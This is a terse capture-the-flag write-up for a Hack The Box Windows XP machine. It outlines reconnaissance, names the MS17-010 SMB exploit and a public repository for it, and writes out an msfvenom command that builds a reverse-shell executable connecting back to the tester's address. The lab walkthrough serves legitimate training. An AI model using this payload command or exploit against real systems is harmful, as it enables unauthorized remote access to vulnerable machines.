URL : https://app.hackthebox.eu/machines/2
IP : 10.10.10.4
Info gathering
- nmap scan port
- enum4linux check version
- nmap check smb version
- So… we know that
- Domain name :
HTB
- OS :
Windows XP
- Open Services :
SMB
- Domain name :
Find Exploit
- Google
XP SMB Exploit
- https://github.com/helviojunior/MS17-010
- MS17-010
- Prepare reverse shell exe file
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7879 -f exe > shell_reverse_tcp
- Run exploit
- Get reverse shell
Flag
- Root Flag
- User Flag